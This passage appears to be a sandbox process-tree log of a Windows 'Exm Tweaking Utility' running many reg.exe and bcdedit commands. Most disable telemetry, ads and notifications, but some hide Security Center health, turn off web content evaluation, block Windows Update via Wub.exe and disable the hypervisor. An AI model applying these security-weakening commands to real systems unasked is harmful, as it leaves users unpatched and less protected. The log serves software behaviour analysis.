                                                                                                                                                      Reg.exe add "HKCU\SOFTWARE\Policies\Microsoft\Windows\Explorer" /v "DisableNotificationCenter" /t REG_DWORD /d "1" /f
                                                                                                                                                      2⤵
                                                                                                                                                        PID:4552
                                                                                                                                                      • C:\Windows\system32\reg.exe
                                                                                                                                                        Reg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows\Windows Feeds" /v "EnableFeeds" /t REG_DWORD /d "0" /f
                                                                                                                                                        2⤵
                                                                                                                                                          PID:3480
                                                                                                                                                        • C:\Windows\system32\reg.exe
                                                                                                                                                          Reg.exe add "HKLM\SOFTWARE\Policies\Microsoft" /v "AllowNewsAndInterests" /t REG_DWORD /d "0" /f
                                                                                                                                                          2⤵
                                                                                                                                                            PID:1680
                                                                                                                                                          • C:\Windows\system32\reg.exe
                                                                                                                                                            Reg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows\System" /v "EnableActivityFeed" /t REG_DWORD /d "0" /f
                                                                                                                                                            2⤵
                                                                                                                                                              PID:1400
                                                                                                                                                            • C:\Windows\system32\reg.exe
                                                                                                                                                              Reg.exe add "HKCU\Control Panel\International\User Profile" /v "HttpAcceptLanguageOptOut" /t REG_DWORD /d "1" /f
                                                                                                                                                              2⤵
                                                                                                                                                                PID:3244
                                                                                                                                                              • C:\Windows\system32\reg.exe
                                                                                                                                                                Reg.exe add "HKCU\Software\Microsoft\Windows\CurrentVersion\AdvertisingInfo" /v "Enabled" /t REG_DWORD /d "0" /f
                                                                                                                                                                2⤵
                                                                                                                                                                  PID:1016
                                                                                                                                                                • C:\Windows\system32\reg.exe
                                                                                                                                                                  Reg.exe add "HKLM\Software\Policies\Microsoft\Windows\System" /v "EnableActivityFeed" /t REG_DWORD /d "0" /f
                                                                                                                                                                  2⤵
                                                                                                                                                                    PID:5028
                                                                                                                                                                  • C:\Windows\system32\reg.exe
                                                                                                                                                                    Reg.exe add "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v "DisallowShaking" /t REG_DWORD /d "1" /f
                                                                                                                                                                    2⤵
                                                                                                                                                                      PID:4576
                                                                                                                                                                    • C:\Windows\system32\reg.exe
                                                                                                                                                                      Reg.exe add "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v "EnableBalloonTips" /t REG_DWORD /d "0" /f
                                                                                                                                                                      2⤵
                                                                                                                                                                        PID:340
                                                                                                                                                                      • C:\Windows\system32\reg.exe
                                                                                                                                                                        Reg.exe add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v "ShowSyncProviderNotifications" /t REG_DWORD /d "0" /f
                                                                                                                                                                        2⤵
                                                                                                                                                                          PID:4992
                                                                                                                                                                        • C:\Windows\system32\reg.exe
                                                                                                                                                                          Reg.exe add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\CapabilityAccessManager\ConsentStore\userNotificationListener" /v "Value" /t REG_SZ /d "Deny" /f
                                                                                                                                                                          2⤵
                                                                                                                                                                            PID:4120
                                                                                                                                                                          • C:\Windows\system32\reg.exe
                                                                                                                                                                            Reg.exe add "HKLM\Software\Policies\Microsoft\Windows\AdvertisingInfo" /v "DisabledByGroupPolicy" /t REG_DWORD /d "1" /f
                                                                                                                                                                            2⤵
                                                                                                                                                                              PID:2584
                                                                                                                                                                            • C:\Windows\system32\reg.exe
                                                                                                                                                                              Reg.exe add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v "Start_TrackProgs" /t REG_DWORD /d "0" /f
                                                                                                                                                                              2⤵
                                                                                                                                                                                PID:1496
                                                                                                                                                                              • C:\Windows\system32\reg.exe
                                                                                                                                                                                Reg.exe add "HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "HideSCAHealth" /t REG_DWORD /d "1" /f
                                                                                                                                                                                2⤵
                                                                                                                                                                                  PID:1956
                                                                                                                                                                                • C:\Windows\system32\reg.exe
                                                                                                                                                                                  Reg.exe add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v "ExtendedUIHoverTime" /t REG_DWORD /d "196608" /f
                                                                                                                                                                                  2⤵
                                                                                                                                                                                    PID:3276
                                                                                                                                                                                  • C:\Windows\system32\reg.exe
                                                                                                                                                                                    Reg.exe add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v "DontPrettyPath" /t REG_DWORD /d "1" /f
                                                                                                                                                                                    2⤵
                                                                                                                                                                                      PID:3672
                                                                                                                                                                                    • C:\Windows\system32\reg.exe
                                                                                                                                                                                      Reg.exe add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v "ListviewShadow" /t REG_DWORD /d "0" /f
                                                                                                                                                                                      2⤵
                                                                                                                                                                                        PID:2036
                                                                                                                                                                                      • C:\Windows\system32\reg.exe
                                                                                                                                                                                        Reg.exe add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v "TaskbarAnimations" /t REG_DWORD /d "0" /f
                                                                                                                                                                                        2⤵
                                                                                                                                                                                          PID:2108
                                                                                                                                                                                        • C:\Windows\system32\reg.exe
                                                                                                                                                                                          Reg.exe add "HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "HideSCAHealth" /t REG_DWORD /d "1" /f
                                                                                                                                                                                          2⤵
                                                                                                                                                                                            PID:2732
                                                                                                                                                                                          • C:\Windows\system32\reg.exe
                                                                                                                                                                                            Reg.exe add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoLowDiskSpaceChecks" /t REG_DWORD /d "1" /f
                                                                                                                                                                                            2⤵
                                                                                                                                                                                              PID:1376
                                                                                                                                                                                            • C:\Windows\system32\reg.exe
                                                                                                                                                                                              Reg.exe add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "LinkResolveIgnoreLinkInfo" /t REG_DWORD /d "1" /f
                                                                                                                                                                                              2⤵
                                                                                                                                                                                                PID:3304
                                                                                                                                                                                              • C:\Windows\system32\reg.exe
                                                                                                                                                                                                Reg.exe add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoResolveSearch" /t REG_DWORD /d "1" /f
                                                                                                                                                                                                2⤵
                                                                                                                                                                                                  PID:1368
                                                                                                                                                                                                • C:\Windows\system32\reg.exe
                                                                                                                                                                                                  Reg.exe add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoResolveTrack" /t REG_DWORD /d "1" /f
                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                    PID:3264
                                                                                                                                                                                                  • C:\Windows\system32\reg.exe
                                                                                                                                                                                                    Reg.exe add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoInternetOpenWith" /t REG_DWORD /d "1" /f
                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                      PID:2640
                                                                                                                                                                                                    • C:\Windows\system32\reg.exe
                                                                                                                                                                                                      Reg.exe add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoInstrumentation" /t REG_DWORD /d "1" /f
                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                        PID:408
                                                                                                                                                                                                      • C:\Windows\system32\reg.exe
                                                                                                                                                                                                        Reg.exe add "HKLM\SYSTEM\CurrentControlSet\Control\Remote Assistance" /v "fAllowToGetHelp" /t REG_DWORD /d "0" /f
                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                          PID:236
                                                                                                                                                                                                        • C:\Windows\system32\reg.exe
                                                                                                                                                                                                          Reg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Edge" /v "StartupBoostEnabled" /t REG_DWORD /d "0" /f
                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                            PID:3716
                                                                                                                                                                                                          • C:\Windows\system32\reg.exe
                                                                                                                                                                                                            Reg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Edge" /v "BackgroundModeEnabled" /t REG_DWORD /d "0" /f
                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                              PID:1048
                                                                                                                                                                                                            • C:\Windows\system32\reg.exe
                                                                                                                                                                                                              Reg.exe add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\SearchSettings" /v "IsDeviceSearchHistoryEnabled" /t REG_DWORD /d "0" /f
                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                PID:1576
                                                                                                                                                                                                              • C:\Windows\system32\reg.exe
                                                                                                                                                                                                                Reg.exe add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\ContentDeliveryManager" /v "SubscribedContent-338393Enabled" /t REG_DWORD /d "0" /f
                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                  PID:3604
                                                                                                                                                                                                                • C:\Windows\system32\reg.exe
                                                                                                                                                                                                                  Reg.exe add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\ContentDeliveryManager" /v "SubscribedContent-353694Enabled" /t REG_DWORD /d "0" /f
                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                    PID:1236
                                                                                                                                                                                                                  • C:\Windows\system32\reg.exe
                                                                                                                                                                                                                    Reg.exe add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\ContentDeliveryManager" /v "SubscribedContent-353696Enabled" /t REG_DWORD /d "0" /f
                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                      PID:4032
                                                                                                                                                                                                                    • C:\Windows\system32\reg.exe
                                                                                                                                                                                                                      Reg.exe add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\SettingSync\Groups\Personalization" /v "Enabled" /t REG_DWORD /d "0" /f
                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                        PID:460
                                                                                                                                                                                                                      • C:\Windows\system32\reg.exe
                                                                                                                                                                                                                        Reg.exe add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\SettingSync\Groups\BrowserSettings" /v "Enabled" /t REG_DWORD /d "0" /f
                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                          PID:2564
                                                                                                                                                                                                                        • C:\Windows\system32\reg.exe
                                                                                                                                                                                                                          Reg.exe add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\SettingSync\Groups\Credentials" /v "Enabled" /t REG_DWORD /d "0" /f
                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                            PID:1056
                                                                                                                                                                                                                          • C:\Windows\system32\reg.exe
                                                                                                                                                                                                                            Reg.exe add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\SettingSync\Groups\Accessibility" /v "Enabled" /t REG_DWORD /d "0" /f
                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                              PID:1492
                                                                                                                                                                                                                            • C:\Windows\system32\reg.exe
                                                                                                                                                                                                                              Reg.exe add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\SettingSync\Groups\Windows" /v "Enabled" /t REG_DWORD /d "0" /f
                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                PID:1128
                                                                                                                                                                                                                              • C:\Windows\system32\reg.exe
                                                                                                                                                                                                                                Reg.exe add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\SettingSync" /v "SyncPolicy" /t REG_DWORD /d "5" /f
                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                  PID:492
                                                                                                                                                                                                                                • C:\Windows\system32\reg.exe
                                                                                                                                                                                                                                  Reg.exe add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\ContentDeliveryManager" /v "SubscribedContent-338393Enabled" /t REG_DWORD /d "0" /f
                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                    PID:4200
                                                                                                                                                                                                                                  • C:\Windows\system32\reg.exe
                                                                                                                                                                                                                                    Reg.exe add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\ContentDeliveryManager" /v "SubscribedContent-353694Enabled" /t REG_DWORD /d "0" /f
                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                      PID:4384
                                                                                                                                                                                                                                    • C:\Windows\system32\reg.exe
                                                                                                                                                                                                                                      Reg.exe add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\ContentDeliveryManager" /v "SubscribedContent-353696Enabled" /t REG_DWORD /d "0" /f
                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                        PID:1596
                                                                                                                                                                                                                                      • C:\Windows\system32\reg.exe
                                                                                                                                                                                                                                        Reg.exe add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MultitaskingView\AllUpView" /v "AllUpView" /t REG_DWORD /d "0" /f
                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                          PID:4960
                                                                                                                                                                                                                                        • C:\Windows\system32\reg.exe
                                                                                                                                                                                                                                          Reg.exe add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MultitaskingView\AllUpView" /v "Remove TaskView" /t REG_DWORD /d "1" /f
                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                            PID:3476
                                                                                                                                                                                                                                          • C:\Windows\system32\reg.exe
                                                                                                                                                                                                                                            Reg.exe add "HKCU\Control Panel\Desktop" /v "AutoEndTasks" /t REG_SZ /d "1" /f
                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                              PID:1240
                                                                                                                                                                                                                                            • C:\Windows\system32\reg.exe
                                                                                                                                                                                                                                              Reg.exe add "HKCU\Control Panel\Desktop" /v "HungAppTimeout" /t REG_SZ /d "1000" /f
                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                                PID:1032
                                                                                                                                                                                                                                              • C:\Windows\system32\reg.exe
                                                                                                                                                                                                                                                Reg.exe add "HKCU\Control Panel\Desktop" /v "WaitToKillAppTimeout" /t REG_SZ /d "2000" /f
                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                  PID:2524
                                                                                                                                                                                                                                                • C:\Windows\system32\reg.exe
                                                                                                                                                                                                                                                  Reg.exe add "HKCU\Control Panel\Desktop" /v "LowLevelHooksTimeout" /t REG_SZ /d "1000" /f
                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                    PID:4324
                                                                                                                                                                                                                                                  • C:\Windows\system32\reg.exe
                                                                                                                                                                                                                                                    Reg.exe add "HKCU\Control Panel\Desktop" /v "MenuShowDelay" /t REG_SZ /d "0" /f
                                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                                      PID:3288
                                                                                                                                                                                                                                                    • C:\Windows\system32\reg.exe
                                                                                                                                                                                                                                                      Reg.exe add "HKLM\SYSTEM\CurrentControlSet\Control" /v "WaitToKillServiceTimeout" /t REG_SZ /d "2000" /f
                                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                                        PID:4724
                                                                                                                                                                                                                                                      • C:\Windows\system32\reg.exe
                                                                                                                                                                                                                                                        Reg.exe add "HKLM\SOFTWARE\Microsoft\Windows Photo Viewer\Capabilities\FileAssociations" /v ".tif" /t REG_SZ /d "PhotoViewer.FileAssoc.Tiff" /f
                                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                                          PID:3172
                                                                                                                                                                                                                                                        • C:\Windows\system32\reg.exe
                                                                                                                                                                                                                                                          Reg.exe add "HKLM\SOFTWARE\Microsoft\Windows Photo Viewer\Capabilities\FileAssociations" /v ".tiff" /t REG_SZ /d "PhotoViewer.FileAssoc.Tiff" /f
                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                            PID:4900
                                                                                                                                                                                                                                                          • C:\Windows\system32\reg.exe
                                                                                                                                                                                                                                                            Reg.exe add "HKLM\SOFTWARE\Microsoft\Windows Photo Viewer\Capabilities\FileAssociations" /v ".bmp" /t REG_SZ /d "PhotoViewer.FileAssoc.Tiff" /f
                                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                                              PID:3184
                                                                                                                                                                                                                                                            • C:\Windows\system32\reg.exe
                                                                                                                                                                                                                                                              Reg.exe add "HKLM\SOFTWARE\Microsoft\Windows Photo Viewer\Capabilities\FileAssociations" /v ".dib" /t REG_SZ /d "PhotoViewer.FileAssoc.Tiff" /f
                                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                                                PID:4004
                                                                                                                                                                                                                                                              • C:\Windows\system32\reg.exe
                                                                                                                                                                                                                                                                Reg.exe add "HKLM\SOFTWARE\Microsoft\Windows Photo Viewer\Capabilities\FileAssociations" /v ".gif" /t REG_SZ /d "PhotoViewer.FileAssoc.Tiff" /f
                                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                                  PID:3852
                                                                                                                                                                                                                                                                • C:\Windows\system32\reg.exe
                                                                                                                                                                                                                                                                  Reg.exe add "HKLM\SOFTWARE\Microsoft\Windows Photo Viewer\Capabilities\FileAssociations" /v ".jfif" /t REG_SZ /d "PhotoViewer.FileAssoc.Tiff" /f
                                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                                    PID:3588
                                                                                                                                                                                                                                                                  • C:\Windows\system32\reg.exe
                                                                                                                                                                                                                                                                    Reg.exe add "HKLM\SOFTWARE\Microsoft\Windows Photo Viewer\Capabilities\FileAssociations" /v ".jpe" /t REG_SZ /d "PhotoViewer.FileAssoc.Tiff" /f
                                                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                                                      PID:1304
                                                                                                                                                                                                                                                                    • C:\Windows\system32\reg.exe
                                                                                                                                                                                                                                                                      Reg.exe add "HKLM\SOFTWARE\Microsoft\Windows Photo Viewer\Capabilities\FileAssociations" /v ".jpeg" /t REG_SZ /d "PhotoViewer.FileAssoc.Tiff" /f
                                                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                                                        PID:4392
                                                                                                                                                                                                                                                                      • C:\Windows\system32\reg.exe
                                                                                                                                                                                                                                                                        Reg.exe add "HKLM\SOFTWARE\Microsoft\Windows Photo Viewer\Capabilities\FileAssociations" /v ".jpg" /t REG_SZ /d "PhotoViewer.FileAssoc.Tiff" /f
                                                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                                                          PID:4224
                                                                                                                                                                                                                                                                        • C:\Windows\system32\reg.exe
                                                                                                                                                                                                                                                                          Reg.exe add "HKLM\SOFTWARE\Microsoft\Windows Photo Viewer\Capabilities\FileAssociations" /v ".jxr" /t REG_SZ /d "PhotoViewer.FileAssoc.Tiff" /f
                                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                                            PID:5008
                                                                                                                                                                                                                                                                          • C:\Windows\system32\reg.exe
                                                                                                                                                                                                                                                                            Reg.exe add "HKLM\SOFTWARE\Microsoft\Windows Photo Viewer\Capabilities\FileAssociations" /v ".png" /t REG_SZ /d "PhotoViewer.FileAssoc.Tiff" /f
                                                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                                                              PID:5096
                                                                                                                                                                                                                                                                            • C:\Windows\system32\reg.exe
                                                                                                                                                                                                                                                                              Reg.exe add "HKCU\Software\Microsoft\Windows\CurrentVersion\AppHost" /v ContentEvaluation /t REG_DWORD /d "0" /f
                                                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                                                                PID:4084
                                                                                                                                                                                                                                                                              • C:\Windows\system32\reg.exe
                                                                                                                                                                                                                                                                                Reg.exe add "HKCU\SOFTWARE\Microsoft\Siuf\Rules" /v "NumberOfSIUFInPeriod" /t REG_DWORD /d "0" /f
                                                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                                                  PID:3668
                                                                                                                                                                                                                                                                                • C:\Windows\system32\reg.exe
                                                                                                                                                                                                                                                                                  Reg.exe add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableAutomaticRestartSignOn" /t REG_DWORD /d "1" /f
                                                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                                                    PID:2284
                                                                                                                                                                                                                                                                                  • C:\Windows\system32\reg.exe
                                                                                                                                                                                                                                                                                    Reg.exe add "HKEY_CURRENT_USER\SYSTEM\GameConfigStore\Children\fefe78e0-cf54-411d-9154-04b8f488bea2" /v "Flags" /t REG_DWORD /d "529" /f
                                                                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                                                                      PID:488
                                                                                                                                                                                                                                                                                    • C:\Windows\system32\reg.exe
                                                                                                                                                                                                                                                                                      Reg.exe add "HKCU\Control Panel\International\User Profile" /v "HttpAcceptLanguageOptOut" /t REG_DWORD /d "1" /f
                                                                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                                                                        PID:3324
                                                                                                                                                                                                                                                                                      • C:\Windows\system32\reg.exe
                                                                                                                                                                                                                                                                                        Reg.exe add "HKCU\Software\Microsoft\Windows\CurrentVersion\AdvertisingInfo" /v "Enabled" /t REG_DWORD /d "0" /f
                                                                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                                                                          PID:1748
                                                                                                                                                                                                                                                                                        • C:\Windows\system32\reg.exe
                                                                                                                                                                                                                                                                                          Reg.exe add "HKCU\Software\Microsoft\Windows\CurrentVersion\AppHost" /v "EnableWebContentEvaluation" /t REG_DWORD /d "0" /f
                                                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                                                            PID:4544
                                                                                                                                                                                                                                                                                          • C:\Windows\system32\reg.exe
                                                                                                                                                                                                                                                                                            Reg.exe add "HKLM\Software\Microsoft\PolicyManager\default\WiFi\AllowAutoConnectToWiFiSenseHotspots" /v "value" /t REG_DWORD /d "0" /f
                                                                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                                                                              PID:2532
                                                                                                                                                                                                                                                                                            • C:\Windows\system32\reg.exe
                                                                                                                                                                                                                                                                                              Reg.exe add "HKLM\Software\Microsoft\PolicyManager\default\WiFi\AllowWiFiHotSpotReporting" /v "value" /t REG_DWORD /d "0" /f
                                                                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                                                                                PID:3356
                                                                                                                                                                                                                                                                                              • C:\Windows\system32\reg.exe
                                                                                                                                                                                                                                                                                                Reg.exe add "HKLM\Software\Microsoft\Windows\CurrentVersion\ImmersiveShell" /v "UseActionCenterExperience" /t REG_DWORD /d "0" /f
                                                                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                                                                  PID:4192
                                                                                                                                                                                                                                                                                                • C:\Windows\system32\reg.exe
                                                                                                                                                                                                                                                                                                  Reg.exe add "HKLM\Software\Policies\Microsoft\Windows\EnhancedStorageDevices" /v "TCGSecurityActivationDisabled" /t REG_DWORD /d "0" /f
                                                                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                                                                    PID:1504
                                                                                                                                                                                                                                                                                                  • C:\Windows\system32\chcp.com
                                                                                                                                                                                                                                                                                                    chcp 437
                                                                                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                                                                                      PID:4784
                                                                                                                                                                                                                                                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                                      powershell -Command "& {Add-Type -AssemblyName System.Windows.Forms; [System.Windows.Forms.MessageBox]::Show('Select disable updates in wub, press ok to open it', 'Exm Tweaking Utility', 'Ok', [System.Windows.Forms.MessageBoxIcon]::Information);}"
                                                                                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                                                                                      • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                                                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                                                                                                      PID:3888
                                                                                                                                                                                                                                                                                                    • C:\Windows\system32\chcp.com
                                                                                                                                                                                                                                                                                                      chcp 65001
                                                                                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                                                                                        PID:1960
                                                                                                                                                                                                                                                                                                      • C:\exm\WindowsUpdateBlocker\Wub.exe
                                                                                                                                                                                                                                                                                                        C:\exm\WindowsUpdateBlocker\Wub.exe
                                                                                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                                                                                        • Modifies security service
                                                                                                                                                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                                                                                                                                                        • Indicator Removal: Clear Persistence
                                                                                                                                                                                                                                                                                                        • Drops file in System32 directory
                                                                                                                                                                                                                                                                                                        • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                                                                                                        • Suspicious behavior: GetForegroundWindowSpam
                                                                                                                                                                                                                                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                                                                                                        PID:1344
                                                                                                                                                                                                                                                                                                      • C:\Windows\system32\chcp.com
                                                                                                                                                                                                                                                                                                        chcp 437
                                                                                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                                                                                          PID:1140
                                                                                                                                                                                                                                                                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                                          powershell -Command "& {Add-Type -AssemblyName System.Windows.Forms; [System.Windows.Forms.MessageBox]::Show('Select disable updates in wub, press ok to open it', 'Exm Tweaking Utility', 'Ok', [System.Windows.Forms.MessageBoxIcon]::Information);}"
                                                                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                                                                          • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                                                                                                                                          PID:4836
                                                                                                                                                                                                                                                                                                        • C:\Windows\system32\chcp.com
                                                                                                                                                                                                                                                                                                          chcp 65001
                                                                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                                                                            PID:4864
                                                                                                                                                                                                                                                                                                          • C:\exm\WindowsUpdateBlocker\Wub.exe
                                                                                                                                                                                                                                                                                                            C:\exm\WindowsUpdateBlocker\Wub.exe
                                                                                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                                                                                                                                                                            • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                                                                                                            • Suspicious behavior: GetForegroundWindowSpam
                                                                                                                                                                                                                                                                                                            PID:1952
                                                                                                                                                                                                                                                                                                          • C:\Windows\system32\reg.exe
                                                                                                                                                                                                                                                                                                            Reg.exe add "HKLM\System\CurrentControlSet\Services\VxD\BIOS" /v "CPUPriority" /t REG_DWORD /d "1" /f
                                                                                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                                                                                              PID:3852
                                                                                                                                                                                                                                                                                                            • C:\Windows\system32\reg.exe
                                                                                                                                                                                                                                                                                                              Reg.exe add "HKLM\System\CurrentControlSet\Services\VxD\BIOS" /v "FastDRAM" /t REG_DWORD /d "1" /f
                                                                                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                                                                                                PID:3588
                                                                                                                                                                                                                                                                                                              • C:\Windows\system32\reg.exe
                                                                                                                                                                                                                                                                                                                Reg.exe add "HKLM\System\CurrentControlSet\Services\VxD\BIOS" /v "AGPConcur" /t REG_DWORD /d "1" /f
                                                                                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                                                                                  PID:1304
                                                                                                                                                                                                                                                                                                                • C:\Windows\system32\reg.exe
                                                                                                                                                                                                                                                                                                                  Reg.exe add "HKLM\System\CurrentControlSet\Services\VxD\BIOS" /v "CPUPriority" /t REG_DWORD /d "1" /f
                                                                                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                                                                                    PID:4392
                                                                                                                                                                                                                                                                                                                  • C:\Windows\system32\reg.exe
                                                                                                                                                                                                                                                                                                                    Reg.exe add "HKLM\System\CurrentControlSet\Services\VxD\BIOS" /v "FastDRAM" /t REG_DWORD /d "1" /f
                                                                                                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                                                                                                      PID:4224
                                                                                                                                                                                                                                                                                                                    • C:\Windows\system32\reg.exe
                                                                                                                                                                                                                                                                                                                      Reg.exe add "HKLM\System\CurrentControlSet\Services\VxD\BIOS" /v "PCIConcur" /t REG_DWORD /d "1" /f
                                                                                                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                                                                                                        PID:564
                                                                                                                                                                                                                                                                                                                      • C:\Windows\system32\timeout.exe
                                                                                                                                                                                                                                                                                                                        timeout /t 1 /nobreak
                                                                                                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                                                                                                        • Delays execution with timeout.exe
                                                                                                                                                                                                                                                                                                                        PID:5008
                                                                                                                                                                                                                                                                                                                      • C:\Windows\system32\bcdedit.exe
                                                                                                                                                                                                                                                                                                                        bcdedit /set tscsyncpolicy legacy
                                                                                                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                                                                                                        • Modifies boot configuration data using bcdedit
                                                                                                                                                                                                                                                                                                                        PID:4084
                                                                                                                                                                                                                                                                                                                      • C:\Windows\system32\timeout.exe
                                                                                                                                                                                                                                                                                                                        timeout /t 1 /nobreak
                                                                                                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                                                                                                        • Delays execution with timeout.exe
                                                                                                                                                                                                                                                                                                                        PID:3668
                                                                                                                                                                                                                                                                                                                      • C:\Windows\system32\bcdedit.exe
                                                                                                                                                                                                                                                                                                                        bcdedit /set hypervisorlaunchtype off
                                                                                                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                                                                                                        • Modifies boot configuration data using bcdedit
                                                                                                                                                                                                                                                                                                                        PID:2284
                                                                                                                                                                                                                                                                                                                      • C:\Windows\system32\timeout.exe
                                                                                                                                                                                                                                                                                                                        timeout /t 1 /nobreak
                                                                                                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                                                                                                        • Delays execution with timeout.exe
                                                                                                                                                                                                                                                                                                                        PID:488
                                                                                                                                                                                                                                                                                                                      • C:\Windows\system32\bcdedit.exe
